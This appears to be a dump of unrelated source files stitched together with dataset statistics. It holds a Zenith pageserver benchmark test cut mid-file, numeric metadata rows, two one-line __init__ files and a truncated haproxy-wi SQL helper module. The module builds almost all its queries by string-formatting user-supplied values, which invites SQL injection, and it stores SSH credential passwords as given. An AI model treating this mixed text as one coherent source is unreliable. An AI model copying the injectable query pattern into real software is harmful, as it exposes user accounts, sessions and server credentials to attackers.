Open a connection directly to the page server that we'll use to force # flushing the layers to disk psconn = env.pageserver.connect() pscur = psconn.cursor() # Get the timeline ID of our branch. 
We need it for the 'do_gc' command conn = pg.connect() cur = conn.cursor() cur.execute("SHOW zenith.zenith_timeline") timeline = cur.fetchone()[0] for worker_id in range(n_parallel): cur.execute(f'CREATE TABLE copytest_{worker_id} (i int, t text)') with zenbenchmark.record_pageserver_writes(env.pageserver, 'pageserver_writes'): with zenbenchmark.record_duration('load'): asyncio.run(parallel_load_different_tables(pg, n_parallel)) # Flush the layers from memory to disk. This is included in the reported # time and I/O pscur.execute(f"do_gc {env.initial_tenant} {timeline} 0") # Record peak memory usage zenbenchmark.record("peak_mem", zenbenchmark.get_peak_mem(env.pageserver) / 1024, 'MB', report=MetricReport.LOWER_IS_BETTER) # Report disk space used by the repository timeline_size = zenbenchmark.get_timeline_size(env.repo_dir, env.initial_tenant, timeline) zenbenchmark.record('size', timeline_size / (1024 * 1024), 'MB', report=MetricReport.LOWER_IS_BETTER) async def parallel_load_same_table(pg: Postgres, n_parallel: int): workers = [] for worker_id in range(n_parallel): worker = copy_test_data_to_table(pg, worker_id, f'copytest') workers.append(asyncio.create_task(worker)) # await all workers await asyncio.gather(*workers) # Load data into one table with COPY TO from 5 parallel connections def test_parallel_copy_same_table(zenith_simple_env: ZenithEnv, zenbenchmark: ZenithBenchmarker, n_parallel=5): env = zenith_simple_env # Create a branch for us env.zenith_cli(["branch", "test_parallel_copy_same_table", "empty"]) pg = env.postgres.create_start('test_parallel_copy_same_table') log.info("postgres is running on 'test_parallel_copy_same_table' branch") # Open a connection directly to the page server that we'll use to force # flushing the layers to disk psconn = env.pageserver.connect() pscur = psconn.cursor() # Get the timeline ID of our branch. 
We need it for the 'do_gc' command conn = pg.connect() cur = conn.cursor() cur.execute("SHOW zenith.zenith_timeline") timeline = cur.fetchone()[0] cur.execute(f'CREATE TABLE copytest (i int, t text)') with zenbenchmark.record_pageserver_writes(env.pageserver, 'pageserver_writes'): with zenbenchmark.record_duration('load'): asyncio.run(parallel_load_same_table(pg, n_parallel)) # Flush the layers from memory to disk. This is included in the reported # time and I/O pscur.execute(f"do_gc {env.initial_tenant} {timeline} 0") # Record peak memory usage zenbenchmark.record("peak_mem", zenbenchmark.get_peak_mem(env.pageserver) / 1024, 'MB', report=MetricReport.LOWER_IS_BETTER) # Report disk space used by the repository timeline_size = zenbenchmark.get_timeline_size(env.repo_dir, env.initial_tenant, timeline) zenbenchmark.record('size', timeline_size / (1024 * 1024), 'MB', report=MetricReport.LOWER_IS_BETTER)
37.858156
96
0.666354
688
5,338
4.953488
0.219477
0.021127
0.037559
0.029343
0.801056
0.742371
0.718603
0.710681
0.710681
0.659624
0
0.010214
0.248033
5,338
140
97
38.128571
0.838814
0.155864
0
0.593023
0
0
0.160312
0.06466
0
0
0
0
0
1
0.023256
false
0
0.069767
0
0.093023
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
38b3930510c7f655ed2192a6dd6be6d530f8167e
35
py
Python
pycuteweb/__init__.py
MatteoMeneghetti/pycuteweb
00a887a1ade717722807ccdf7e907ac7af2fac8e
[ "MIT" ]
1
2020-11-23T14:32:48.000Z
2020-11-23T14:32:48.000Z
pycuteweb/__init__.py
matteomeneghetti/pycuteweb
00a887a1ade717722807ccdf7e907ac7af2fac8e
[ "MIT" ]
null
null
null
pycuteweb/__init__.py
matteomeneghetti/pycuteweb
00a887a1ade717722807ccdf7e907ac7af2fac8e
[ "MIT" ]
null
null
null
from .pycuteweb import Application
17.5
34
0.857143
4
35
7.5
1
0
0
0
0
0
0
0
0
0
0
0
0.114286
35
1
35
35
0.967742
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
c7fd5a18f4cacb78cfc3fc91e01368640fd76090
24
py
Python
psy/irt/__init__.py
Alias-Alan/pypsy
f055fe1f4901b654d99d9a776152e8192e014f5f
[ "MIT" ]
169
2017-08-29T01:35:49.000Z
2022-03-01T05:03:02.000Z
psy/irt/__init__.py
a854367688/pypsy
f055fe1f4901b654d99d9a776152e8192e014f5f
[ "MIT" ]
8
2017-12-05T05:20:35.000Z
2021-10-03T05:40:45.000Z
psy/irt/__init__.py
a854367688/pypsy
f055fe1f4901b654d99d9a776152e8192e014f5f
[ "MIT" ]
67
2017-09-01T04:18:54.000Z
2022-02-24T08:21:18.000Z
from psy.irt import grm
12
23
0.791667
5
24
3.8
1
0
0
0
0
0
0
0
0
0
0
0
0.166667
24
1
24
24
0.95
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
2a0cd6c2618e35a94bc55ef02d0418e339f9e5fa
48,788
py
Python
app/sql.py
lgrawet/haproxy-wi
a28741435dc10c6aafe662050e587f08536583f2
[ "Apache-2.0" ]
null
null
null
app/sql.py
lgrawet/haproxy-wi
a28741435dc10c6aafe662050e587f08536583f2
[ "Apache-2.0" ]
null
null
null
app/sql.py
lgrawet/haproxy-wi
a28741435dc10c6aafe662050e587f08536583f2
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import funct mysql_enable = funct.get_config_var('mysql', 'enable') if mysql_enable == '1': import mysql.connector as sqltool else: db = "/var/www/haproxy-wi/app/haproxy-wi.db" import sqlite3 as sqltool def get_cur(): try: if mysql_enable == '0': con = sqltool.connect(db, isolation_level=None) else: mysql_user = funct.get_config_var('mysql', 'mysql_user') mysql_password = funct.get_config_var('mysql', 'mysql_password') mysql_db = funct.get_config_var('mysql', 'mysql_db') mysql_host = funct.get_config_var('mysql', 'mysql_host') mysql_port = funct.get_config_var('mysql', 'mysql_port') con = sqltool.connect(user=mysql_user, password=mysql_password, host=mysql_host, port=mysql_port, database=mysql_db) cur = con.cursor() except sqltool.Error as e: funct.logging('DB ', ' '+e, haproxywi=1, login=1) else: return con, cur def add_user(user, email, password, role, group, activeuser): con, cur = get_cur() if password != 'aduser': sql = """INSERT INTO user (username, email, password, role, groups, activeuser) VALUES ('%s', '%s', '%s', '%s', '%s', '%s')""" % (user, email, funct.get_hash(password), role, group, activeuser) else: sql = """INSERT INTO user (username, email, role, groups, ldap_user, activeuser) VALUES ('%s', '%s', '%s', '%s', '1', '%s')""" % (user, email, role, group, activeuser) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() return False else: return True cur.close() con.close() def update_user(user, email, role, group, id, activeuser): con, cur = get_cur() sql = """update user set username = '%s', email = '%s', role = '%s', groups = '%s', activeuser = '%s' where id = '%s'""" % (user, email, role, group, activeuser, id) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() return False else: return True cur.close() con.close() def update_user_password(password, id): con, cur = get_cur() sql = """update user set password = '%s' 
where id = '%s'""" % (funct.get_hash(password), id) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() return False else: return True cur.close() con.close() def delete_user(id): con, cur = get_cur() sql = """delete from user where id = '%s'""" % (id) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() return False else: return True cur.close() con.close() def add_group(name, description): con, cur = get_cur() sql = """INSERT INTO groups (name, description) VALUES ('%s', '%s')""" % (name, description) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() return False else: return True cur.close() con.close() def delete_group(id): con, cur = get_cur() sql = """ delete from groups where id = '%s'""" % (id) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() else: return True cur.close() con.close() def update_group(name, descript, id): con, cur = get_cur() sql = """ update groups set name = '%s', description = '%s' where id = '%s'; """ % (name, descript, id) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() return False else: return True cur.close() con.close() def add_server(hostname, ip, group, typeip, enable, master, cred, port, desc, haproxy, nginx): con, cur = get_cur() sql = """ INSERT INTO servers (hostname, ip, groups, type_ip, enable, master, cred, port, `desc`, haproxy, nginx) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s') """ % (hostname, ip, group, typeip, enable, master, cred, port, desc, haproxy, nginx) try: cur.execute(sql) con.commit() return True except sqltool.Error as e: funct.out_error(e) con.rollback() return False cur.close() con.close() def delete_server(id): con, cur = get_cur() sql = """ delete from servers where id = '%s'""" % (id) try: cur.execute(sql) con.commit() except sqltool.Error as e: 
funct.out_error(e) con.rollback() else: return True cur.close() con.close() def update_hapwi_server(id, alert, metrics, active): con, cur = get_cur() sql = """ update servers set alert = '%s', metrics = '%s', active = '%s' where id = '%s'""" % (alert, metrics, active, id) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() cur.close() con.close() def update_server(hostname, group, typeip, enable, master, id, cred, port, desc, haproxy, nginx): con, cur = get_cur() sql = """ update servers set hostname = '%s', groups = '%s', type_ip = '%s', enable = '%s', master = '%s', cred = '%s', port = '%s', `desc` = '%s', haproxy = '%s', nginx = '%s' where id = '%s'""" % (hostname, group, typeip, enable, master, cred, port, desc, haproxy, nginx, id) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() cur.close() con.close() def update_server_master(master, slave): con, cur = get_cur() sql = """ select id from servers where ip = '%s' """ % master try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) for id in cur.fetchall(): sql = """ update servers set master = '%s' where ip = '%s' """ % (id[0], slave) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() cur.close() con.close() def select_users(**kwargs): con, cur = get_cur() sql = """select * from user ORDER BY id""" if kwargs.get("user") is not None: sql = """select * from user where username='%s' """ % kwargs.get("user") if kwargs.get("id") is not None: sql = """select * from user where id='%s' """ % kwargs.get("id") try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def select_groups(**kwargs): con, cur = get_cur() sql = """select * from groups ORDER BY id""" if kwargs.get("group") is not None: sql = """select * from groups where name='%s' """ % kwargs.get("group") if kwargs.get("id") is not None: sql = """select * 
from groups where id='%s' """ % kwargs.get("id") try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def select_user_name_group(id): con, cur = get_cur() sql = """select name from groups where id='%s' """ % id try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: for group in cur.fetchone(): return group cur.close() con.close() def select_server_by_name(name): con, cur = get_cur() sql = """select ip from servers where hostname='%s' """ % name try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: for name in cur.fetchone(): return name cur.close() con.close() def select_servers(**kwargs): con, cur = get_cur() sql = """select * from servers where enable = '1' ORDER BY groups """ if kwargs.get("server") is not None: sql = """select * from servers where ip='%s' """ % kwargs.get("server") if kwargs.get("full") is not None: sql = """select * from servers ORDER BY hostname """ if kwargs.get("get_master_servers") is not None: sql = """select id,hostname from servers where master = 0 and type_ip = 0 and enable = 1 ORDER BY groups """ if kwargs.get("get_master_servers") is not None and kwargs.get('uuid') is not None: sql = """ select servers.id, servers.hostname from servers left join user as user on servers.groups = user.groups left join uuid as uuid on user.id = uuid.user_id where uuid.uuid = '%s' and servers.master = 0 and servers.type_ip = 0 and servers.enable = 1 ORDER BY servers.groups """ % kwargs.get('uuid') if kwargs.get("id"): sql = """select * from servers where id='%s' """ % kwargs.get("id") if kwargs.get("hostname"): sql = """select * from servers where hostname='%s' """ % kwargs.get("hostname") if kwargs.get("id_hostname"): sql = """select * from servers where hostname='%s' or id = '%s' or ip = '%s'""" % (kwargs.get("id_hostname"), kwargs.get("id_hostname"), kwargs.get("id_hostname")) if kwargs.get("server") and kwargs.get("keep_alive"): sql = """select 
active from servers where ip='%s' """ % kwargs.get("server") try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def write_user_uuid(login, user_uuid): con, cur = get_cur() session_ttl = get_setting('session_ttl') session_ttl = int(session_ttl) sql = """ select id from user where username = '%s' """ % login try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) for id in cur.fetchall(): if mysql_enable == '1': sql = """ insert into uuid (user_id, uuid, exp) values('%s', '%s', now()+ INTERVAL '%s' day) """ % (id[0], user_uuid, session_ttl) else: sql = """ insert into uuid (user_id, uuid, exp) values('%s', '%s', datetime('now', '+%s days')) """ % (id[0], user_uuid, session_ttl) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() cur.close() con.close() def write_user_token(login, user_token): con, cur = get_cur() token_ttl = get_setting('token_ttl') sql = """ select id from user where username = '%s' """ % login try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) for id in cur.fetchall(): if mysql_enable == '1': sql = """ insert into token (user_id, token, exp) values('%s', '%s', now()+ INTERVAL %s day) """ % (id[0], user_token, token_ttl) else: sql = """ insert into token (user_id, token, exp) values('%s', '%s', datetime('now', '+%s days')) """ % (id[0], user_token, token_ttl) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() cur.close() con.close() def get_token(uuid): con, cur = get_cur() sql = """ select token.token from token left join uuid as uuid on uuid.user_id = token.user_id where uuid.uuid = '%s' """ % uuid try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: for token in cur.fetchall(): return token[0] cur.close() con.close() def delete_uuid(uuid): con, cur = get_cur() sql = """ delete from uuid where uuid = '%s' """ % uuid try: cur.execute(sql) 
def delete_old_uuid():
    """Purge expired (or NULL-exp) session uuids and API tokens."""
    con, cur = get_cur()
    if mysql_enable == '1':
        sql = """delete from uuid where exp < now() or exp is NULL """
        sql1 = """delete from token where exp < now() or exp is NULL """
    else:
        sql = """delete from uuid where exp < datetime('now') or exp is NULL"""
        sql1 = """delete from token where exp < datetime('now') or exp is NULL"""
    try:
        cur.execute(sql)
        cur.execute(sql1)
        con.commit()
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
    cur.close()
    con.close()


def update_last_act_user(uuid):
    """Slide the session expiry of `uuid` forward by `session_ttl` days."""
    con, cur = get_cur()
    session_ttl = get_setting('session_ttl')
    if mysql_enable == '1':
        sql = """update uuid set exp = now()+ INTERVAL %s day where uuid = '%s' """ % (session_ttl, uuid)
    else:
        sql = """update uuid set exp = datetime('now', '+%s days') where uuid = '%s' """ % (session_ttl, uuid)
    try:
        cur.execute(sql)
        con.commit()
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
    cur.close()
    con.close()


def get_user_name_by_uuid(uuid):
    """Return the username owning the session uuid, or None."""
    con, cur = get_cur()
    sql = """select user.username from user left join uuid as uuid on user.id = uuid.user_id where uuid.uuid = '%s' """ % uuid
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        for user_id in cur.fetchall():
            return user_id[0]
    cur.close()
    con.close()


def get_user_role_by_uuid(uuid):
    """Return the role id of the session's user, or None (parameterized query)."""
    con, cur = get_cur()
    try:
        cur.execute("select role.id from user left join uuid as uuid on user.id = uuid.user_id left join role on role.name = user.role where uuid.uuid = ?", (uuid,))
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        for user_id in cur.fetchall():
            return user_id[0]
    cur.close()
    con.close()


def get_role_id_by_name(name):
    """Return the id of the role named `name`, or None."""
    con, cur = get_cur()
    sql = """select id from role where name = '%s' """ % name
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        for user_id in cur.fetchall():
            return user_id[0]
    cur.close()
    con.close()


def get_user_group_by_uuid(uuid):
    """Return the groups value of the session's user, or None."""
    con, cur = get_cur()
    sql = """select user.groups from user left join uuid as uuid on user.id = uuid.user_id where uuid.uuid = '%s' """ % uuid
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        for user_id in cur.fetchall():
            return user_id[0]
    cur.close()
    con.close()


def get_user_telegram_by_uuid(uuid):
    """Return the telegram rows visible to the session's user group."""
    con, cur = get_cur()
    sql = """select telegram.* from telegram
        left join user as user on telegram.groups = user.groups
        left join uuid as uuid on user.id = uuid.user_id
        where uuid.uuid = '%s' """ % uuid
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        return cur.fetchall()
    cur.close()
    con.close()


def get_telegram_by_ip(ip):
    """Return the telegram rows for the group of the server with this ip."""
    con, cur = get_cur()
    sql = """select telegram.* from telegram left join servers as serv on serv.groups = telegram.groups where serv.ip = '%s' """ % ip
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        return cur.fetchall()
    cur.close()
    con.close()


def get_dick_permit(**kwargs):
    """Return the server rows the current (or `username`) user may see.

    Optional filters: virt (include virtual ips), disable=0 (include disabled),
    ip, haproxy, nginx, keepalived.  Group '1' is treated as the admin group
    and sees all servers.
    """
    import http.cookies
    import os
    cookie = http.cookies.SimpleCookie(os.environ.get("HTTP_COOKIE"))
    user_id = cookie.get('uuid')
    disable = ''
    haproxy = ''
    nginx = ''
    keepalived = ''
    ip = ''
    con, cur = get_cur()
    if kwargs.get('username'):
        sql = """select * from user where username = '%s' """ % kwargs.get('username')
    else:
        sql = """select * from user where username = '%s' """ % get_user_name_by_uuid(user_id.value)
    if kwargs.get('virt'):
        type_ip = ""
    else:
        type_ip = "and type_ip = 0"
    if kwargs.get('disable') == 0:
        disable = 'or enable = 0'
    if kwargs.get('ip'):
        ip = "and ip = '%s'" % kwargs.get('ip')
    if kwargs.get('haproxy'):
        haproxy = "and haproxy = 1"
    if kwargs.get('nginx'):
        nginx = "and nginx = 1"
    if kwargs.get('keepalived'):
        # BUGFIX: this branch previously assigned into `nginx`, so the
        # {keepalived} placeholder below was always empty and a keepalived
        # filter silently replaced any nginx filter.
        keepalived = "and keepalived = 1"
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        print("An error occurred:", e)
    else:
        for group in cur:
            if group[5] == '1':
                # Admin group: no group restriction.  The keepalived slot is
                # included here because the original code carried it in `nginx`.
                sql = """select * from servers where enable = 1 %s %s %s %s """ % (disable, type_ip, nginx, keepalived)
            else:
                sql = """select * from servers where groups like '%{group}%' and (enable = 1 {disable}) {type_ip} {ip} {haproxy} {nginx} {keepalived} """.format(
                    group=group[5], disable=disable, type_ip=type_ip, ip=ip, haproxy=haproxy, nginx=nginx, keepalived=keepalived)
            try:
                cur.execute(sql)
            except sqltool.Error as e:
                funct.out_error(e)
            else:
                return cur.fetchall()
    cur.close()
    con.close()
def is_master(ip, **kwargs):
    """Return the slaves of the master with this ip, or with `master_slave`,
    every (master hostname, master ip, slave hostname, slave ip) pair."""
    con, cur = get_cur()
    sql = """select slave.ip, slave.hostname from servers as master
        left join servers as slave on master.id = slave.master
        where master.ip = '%s' """ % ip
    if kwargs.get('master_slave'):
        sql = """select master.hostname, master.ip, slave.hostname, slave.ip from servers as master
            left join servers as slave on master.id = slave.master
            where slave.master > 0 """
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        return cur.fetchall()
    cur.close()
    con.close()


def select_ssh(**kwargs):
    """Return SSH credential rows: all, by `name`, by `id`, or for a server ip via `serv`."""
    con, cur = get_cur()
    sql = """select * from cred """
    if kwargs.get("name") is not None:
        sql = """select * from cred where name = '%s' """ % kwargs.get("name")
    if kwargs.get("id") is not None:
        sql = """select * from cred where id = '%s' """ % kwargs.get("id")
    if kwargs.get("serv") is not None:
        sql = """select serv.cred, cred.* from servers as serv left join cred on cred.id = serv.cred where serv.ip = '%s' """ % kwargs.get("serv")
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        return cur.fetchall()
    cur.close()
    con.close()


def insert_new_ssh(name, enable, group, username, password):
    """Create an SSH credential row; return True on success."""
    con, cur = get_cur()
    sql = """insert into cred(name, enable, groups, username, password) values ('%s', '%s', '%s', '%s', '%s') """ % (name, enable, group, username, password)
    try:
        cur.execute(sql)
        con.commit()
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
    else:
        return True
    cur.close()
    con.close()


def delete_ssh(id):
    """Delete the SSH credential row `id`; return True on success."""
    con, cur = get_cur()
    sql = """delete from cred where id = %s """ % (id)
    try:
        cur.execute(sql)
        con.commit()
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
    else:
        return True
    cur.close()
    con.close()


def update_ssh(id, name, enable, group, username, password):
    """Update the SSH credential row `id`."""
    con, cur = get_cur()
    # FIX: `groups` is now quoted like every other value (insert_new_ssh quotes
    # it too); the original emitted `groups = <raw>`, which breaks for
    # non-numeric group values.
    sql = """update cred set name = '%s', enable = '%s', groups = '%s', username = '%s', password = '%s' where id = '%s' """ % (name, enable, group, username, password, id)
    try:
        cur.execute(sql)
        con.commit()
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
    cur.close()
    con.close()


def insert_backup_job(server, rserver, rpath, type, time, cred, description):
    """Create a backup job row; return True on success, False on DB error."""
    con, cur = get_cur()
    sql = """insert into backups(server, rhost, rpath, type, time, cred, description) values ('%s', '%s', '%s', '%s', '%s', '%s', '%s') """ % (server, rserver, rpath, type, time, cred, description)
    try:
        cur.execute(sql)
        con.commit()
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
        return False
    else:
        return True
    cur.close()
    con.close()


def select_backups(**kwargs):
    """Return backup job rows, optionally filtered by server + rserver."""
    con, cur = get_cur()
    sql = """select * from backups ORDER BY id"""
    if kwargs.get("server") is not None and kwargs.get("rserver") is not None:
        sql = """select * from backups where server='%s' and rhost = '%s' """ % (kwargs.get("server"), kwargs.get("rserver"))
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        return cur.fetchall()
    cur.close()
    con.close()


def update_backup(server, rserver, rpath, type, time, cred, description, id):
    """Update the backup job row `id`; return True on success, False on DB error."""
    con, cur = get_cur()
    sql = """update backups set server = '%s', rhost = '%s', rpath = '%s', type = '%s', time = '%s', cred = '%s', description = '%s' where id = '%s' """ % (server, rserver, rpath, type, time, cred, description, id)
    try:
        cur.execute(sql)
        con.commit()
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
        return False
    else:
        return True
    cur.close()
    con.close()


def delete_backups(id):
    """Delete the backup job row `id`; return True on success."""
    con, cur = get_cur()
    sql = """delete from backups where id = %s """ % (id)
    try:
        cur.execute(sql)
        con.commit()
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
    else:
        return True
    cur.close()
    con.close()


def check_exists_backup(server):
    """Return True if a backup job exists for `server`, False for the first NULL id, None if no rows."""
    con, cur = get_cur()
    sql = """select id from backups where server = '%s' """ % server
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        for s in cur.fetchall():
            if s[0] is not None:
                return True
            else:
                return False
    cur.close()
    con.close()


def insert_new_telegram(token, chanel, group):
    """Create a telegram notifier row; return True on success, print an HTML error otherwise."""
    con, cur = get_cur()
    sql = """insert into telegram(`token`, `chanel_name`, `groups`) values ('%s', '%s', '%s') """ % (token, chanel, group)
    try:
        cur.execute(sql)
        con.commit()
    except sqltool.Error as e:
        print('<span class="alert alert-danger" id="error">An error occurred: ' + e.args[0] + ' <a title="Close" id="errorMess"><b>X</b></a></span>')
        con.rollback()
    else:
        return True
    cur.close()
    con.close()


def delete_telegram(id):
    """Delete the telegram notifier row `id`; return True on success."""
    con, cur = get_cur()
    sql = """delete from telegram where id = %s """ % (id)
    try:
        cur.execute(sql)
        con.commit()
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
    else:
        return True
    cur.close()
    con.close()


def select_telegram(**kwargs):
    """Return telegram notifier rows: all, or filtered by group, token, or id."""
    con, cur = get_cur()
    sql = """select * from telegram """
    if kwargs.get('group'):
        sql = """select * from telegram where groups = '%s' """ % kwargs.get('group')
    if kwargs.get('token'):
        sql = """select * from telegram where token = '%s' """ % kwargs.get('token')
    if kwargs.get('id'):
        sql = """select * from telegram where id = '%s' """ % kwargs.get('id')
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        return cur.fetchall()
    cur.close()
    con.close()


# FIX: the original file contained a second, byte-identical definition of
# insert_new_telegram here (a copy-paste duplicate that silently shadowed the
# first).  It has been removed.


def update_telegram(token, chanel, group, id):
    """Update the telegram notifier row `id`."""
    con, cur = get_cur()
    sql = """update telegram set `token` = '%s', `chanel_name` = '%s', `groups` = '%s' where id = '%s' """ % (token, chanel, group, id)
    try:
        cur.execute(sql)
        con.commit()
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
    cur.close()
    con.close()
def insert_new_option(option, group):
    """Create an autocomplete option for `group`; return True on success."""
    con, cur = get_cur()
    sql = """insert into options(`options`, `groups`) values ('%s', '%s') """ % (option, group)
    try:
        cur.execute(sql)
        con.commit()
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
    else:
        return True
    cur.close()
    con.close()


def select_options(**kwargs):
    """Return option rows: all, one by `option`, or a prefix search by group + term."""
    con, cur = get_cur()
    sql = """select * from options """
    if kwargs.get('option'):
        sql = """select * from options where options = '%s' """ % kwargs.get('option')
    if kwargs.get('group'):
        # NOTE(review): if `term` is absent this interpolates the literal
        # string 'None%' — confirm callers always pass term with group.
        sql = """select options from options where groups = '{}' and options like '{}%' """.format(kwargs.get('group'), kwargs.get('term'))
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        return cur.fetchall()
    cur.close()
    con.close()


def update_options(option, id):
    """Update the option row `id`."""
    con, cur = get_cur()
    sql = """update options set options = '%s' where id = '%s' """ % (option, id)
    try:
        cur.execute(sql)
        con.commit()
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
    cur.close()
    con.close()


def delete_option(id):
    """Delete the option row `id`; return True on success."""
    con, cur = get_cur()
    sql = """delete from options where id = %s """ % (id)
    try:
        cur.execute(sql)
        con.commit()
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
    else:
        return True
    cur.close()
    con.close()


def insert_new_savedserver(server, description, group):
    """Create a saved-server row for `group`; return True on success."""
    con, cur = get_cur()
    sql = """insert into saved_servers(`server`, `description`, `groups`) values ('%s', '%s', '%s') """ % (server, description, group)
    try:
        cur.execute(sql)
        con.commit()
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
    else:
        return True
    cur.close()
    con.close()


def select_saved_servers(**kwargs):
    """Return saved-server rows: all, one by `server`, or a prefix search by group + term."""
    con, cur = get_cur()
    sql = """select * from saved_servers """
    if kwargs.get('server'):
        sql = """select * from saved_servers where server = '%s' """ % kwargs.get('server')
    if kwargs.get('group'):
        sql = """select server,description from saved_servers where groups = '{}' and server like '{}%' """.format(kwargs.get('group'), kwargs.get('term'))
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        return cur.fetchall()
    cur.close()
    con.close()


def update_savedserver(server, description, id):
    """Update the saved-server row `id`."""
    con, cur = get_cur()
    sql = """update saved_servers set server = '%s', description = '%s' where id = '%s' """ % (server, description, id)
    try:
        cur.execute(sql)
        con.commit()
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
    cur.close()
    con.close()


def delete_savedserver(id):
    """Delete the saved-server row `id`; return True on success."""
    con, cur = get_cur()
    sql = """delete from saved_servers where id = %s """ % (id)
    try:
        cur.execute(sql)
        con.commit()
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
    else:
        return True
    cur.close()
    con.close()


def insert_mentrics(serv, curr_con, cur_ssl_con, sess_rate, max_sess_rate):
    """Append one HAProxy metrics sample for `serv`, timestamped by the DB."""
    con, cur = get_cur()
    if mysql_enable == '1':
        sql = """insert into metrics (serv, curr_con, cur_ssl_con, sess_rate, max_sess_rate, date) values('%s', '%s', '%s', '%s', '%s', now()) """ % (serv, curr_con, cur_ssl_con, sess_rate, max_sess_rate)
    else:
        sql = """insert into metrics (serv, curr_con, cur_ssl_con, sess_rate, max_sess_rate, date) values('%s', '%s', '%s', '%s', '%s', datetime('now', 'localtime')) """ % (serv, curr_con, cur_ssl_con, sess_rate, max_sess_rate)
    try:
        cur.execute(sql)
        con.commit()
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
    cur.close()
    con.close()


def select_waf_metrics_enable(id):
    """Return the waf.metrics flag rows for the server id."""
    con, cur = get_cur()
    sql = """select waf.metrics from waf left join servers as serv on waf.server_id = serv.id where server_id = '%s' """ % id
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        return cur.fetchall()
    cur.close()
    con.close()


def select_waf_metrics_enable_server(ip):
    """Return the waf.metrics flag for the server with this ip, or None."""
    con, cur = get_cur()
    sql = """select waf.metrics from waf left join servers as serv on waf.server_id = serv.id where ip = '%s' """ % ip
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        for enable in cur.fetchall():
            return enable[0]
    cur.close()
    con.close()


def select_waf_servers(serv):
    """Return the ip rows of WAF-enabled servers matching `serv`."""
    con, cur = get_cur()
    sql = """select serv.ip from waf left join servers as serv on waf.server_id = serv.id where serv.ip = '%s' """ % serv
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        return cur.fetchall()
    cur.close()
    con.close()


def select_all_waf_servers():
    """Return the ip rows of every WAF-enabled server."""
    con, cur = get_cur()
